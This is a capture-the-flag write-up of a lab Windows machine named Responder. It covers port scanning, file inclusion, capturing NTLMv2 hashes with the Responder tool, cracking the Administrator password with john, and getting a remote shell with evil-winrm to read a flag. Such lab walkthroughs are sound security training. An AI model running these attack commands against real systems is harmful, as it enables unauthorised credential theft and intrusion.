Responder offers a nice intro to some basic exploits and techniques, but I’ll need to do some patching and reconnecting to make progress.
After finding a website being served over HTTP, I’ll do some source code analysis to uncover how I can pass in some URL parameters to launch different versions of the site. Then some Local/Remote File Inclusion (LFI/RFI) vulnerabilities will allow me to read some important files which should never have been publicly accessible.
The main focus of the box, however, isn’t the website, it’s the service running on the other port. I’ll leverage how this service offers up too much to other hosts on the network, then crack a hash, which will give me a foothold.
After authenticating as an admin, I’ll have easy access to uncover the flag in another user’s home directory.
nmap shows me two open TCP ports:
sam@kali$ nmap -p- -Pn --min-rate 10000 10.129.138.195 | tee responder-nmap-01.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 21:35 GMT Nmap scan report for 10.129.138.195 Host is up (0.039s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 5985/tcp open wsman Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
No surprises to see port 80 open for HTTP, and adminsub.net sheds a little more light on port 5985: it’s used for Web Services for Management (WS-Management), “a public standard for remotely exchanging management data with any computer device that implements the protocol.”
nmap again, this time with the version/service info script, to try and dig deeper into what’s listening on these ports.
sam@kali$ nmap -p 80,5985 -sCV 10.129.138.195 | tee responder-nmap-02.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 21:44 GMT Nmap scan report for 10.129.138.195 Host is up (0.042s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 |_http-title: Unika 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.43 seconds
I can see this is a Windows box running the Apache web server on port 80, along with OpenSSL, and PHP as the scripting language.
I want to learn more about this Microsoft HTTPAPI (SSDP/UPnP). I recognise UPnP as Universal Plug and Play, which is commonly associated with online gaming and is known to be vulnerable.
I’m going to add the target IP to my
/etc/hosts file, then open up a browser to see what’s being served on port 80.
sam@kali$ echo "10.129.138.195 responder" | sudo tee -a /etc/hosts
Website, TCP 80
Visiting http://responder, I’m immediately redirected to http://unika.htb. Before looking into the redirect, I’ll update my hosts file with the new domain and run the
dirb crawler on it to see if anything interesting turns up.
Crawling with dirb
sam@kali$ dirb http://unika.htb /usr/share/wordlists/dirb/big.txt | tee responder-dirb-01.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Jan 31 21:51:24 2023 URL_BASE: http://unika.htb/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: http://unika.htb/ ---- + http://unika.htb/aux (CODE:403|SIZE:298) + http://unika.htb/cgi-bin/ (CODE:403|SIZE:298) + http://unika.htb/com1 (CODE:403|SIZE:298) + http://unika.htb/com2 (CODE:403|SIZE:298) + http://unika.htb/com3 (CODE:403|SIZE:298) + http://unika.htb/com4 (CODE:403|SIZE:298) + http://unika.htb/con (CODE:403|SIZE:298) ==> DIRECTORY: http://unika.htb/css/ + http://unika.htb/examples (CODE:503|SIZE:398) ==> DIRECTORY: http://unika.htb/img/ ==> DIRECTORY: http://unika.htb/inc/ ==> DIRECTORY: http://unika.htb/js/ + http://unika.htb/licenses (CODE:403|SIZE:417) + http://unika.htb/lpt1 (CODE:403|SIZE:298) + http://unika.htb/lpt2 (CODE:403|SIZE:298) + http://unika.htb/nul (CODE:403|SIZE:298) + http://unika.htb/phpmyadmin (CODE:403|SIZE:417) + http://unika.htb/prn (CODE:403|SIZE:298) + http://unika.htb/server-info (CODE:403|SIZE:417) + http://unika.htb/server-status (CODE:403|SIZE:417) + http://unika.htb/webalizer (CODE:403|SIZE:417)
I get a lot of interesting files and directories found during the crawl, but most return 403 error codes (Forbidden). It looks like the only publicly accessible directories are
/img, which contains plenty of images but seemingly nothing that will help me.
UNIKA site homepage
There’s nothing special about the site itself, but switching language versions reveals the parameters that are being used with index.php in the URL:
This leads me to wonder how else I can manipulate the content loaded based on directory walking and URL manipulation. If I swap out the language-specific HTML page (german.html) for a file path, might I see more than I’m meant to?
Local File Inclusion (LFI)
Bearing in mind this is a Windows box…
Sure enough, the site is vulnerable to Local File Inclusion (LFI). Later on, you’ll realise how easy this technique would have made it to read a certain text file we need, if only we knew which paths to try.
This wordlist provides many more prospective LFI paths.
wsman, TCP 5985
Turning my attention to the
wsman service running on port 5985, I do a bit of browsing which leads me to HackTricks, and I learn this port is associated with Windows Remote Management (WinRM). This protocol is easily exploited and there’s a tool to help us:
evil-winrm. But first I’ll need a username and password.
This machine is called Responder, and this is the name of the next tool I’m going to utilise.
responder allows the user to force a target to divulge usernames and hashes. When a hostname is deliberately miss-spelt and can’t be resolved, other hosts on the subnet will look for any other host to help them out.
responder will jump in and respond to the requests.
sam@kali$ sudo responder unika.htb -I tun0
I’ll leverage the target’s vulnerability to Remote File Inclusion (RFI) to trigger a SMB response, which should hopefully provide me credentials.
Hash cracking with john the ripper
After saving the hash in a text file, I run
john against it with the rockyou.txt wordlist, which is always readily available in Kali. The hash is cracked instantly, giving me the password “badminton” for Administrator.
sam@kali$ john --wordlist=/usr/share/wordlists/rockyou.txt responder-hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status badminton (Administrator) 1g 0:00:00:00 DONE (2023-02-02 20:44) 14.28g/s 58514p/s 58514c/s 58514C/s adriano..oooooo Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
For whatever reason,
ruby was installed in my Kali VM but needed to be “compiled with readline support”, which apparently it wasn’t, so I had to follow this guide. I then found I had to reconnect to the target over TCP before
evil-winrm would work on the target.
sam@kali$ evil-winrm -i 10.129.138.195 -u Administrator -p badminton 130 ⨯ Evil-WinRM shell v3.4 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
cd / to start looking around in root. There isn’t much to be found under Administrator, so I’ll try the user mike instead.
*Evil-WinRM* PS C:\Users> cd "C:/Users/" *Evil-WinRM* PS C:\Users> ls Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 3/9/2022 5:35 PM Administrator d----- 3/9/2022 5:33 PM mike d-r--- 10/10/2020 12:37 PM Public
Sure enough, the flag is found on mike’s Desktop.
*Evil-WinRM* PS C:\Users> ls "C:/Users/mike/Desktop/" Directory: C:\Users\mike\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/10/2022 4:50 AM 32 flag.txt *Evil-WinRM* PS C:\Users> cat "C:/Users/mike/Desktop/flag.txt" ea81b7afddd03efaa09453##########
Despite being a ‘Very Easy’ machine, unexpected issues and challenges can crop up when you least expect them, such as the need to patch
ruby before I could use
evil-winrm, and having to reconnect with OpenVPN using TCP instead of UDP.
These gotchas can be frustrating, especially for beginners (including myself), but as usual it always helps to consult the internet. In almost all cases, someone else has run into the same issue, and the solution can sometimes be simpler than first anticipated.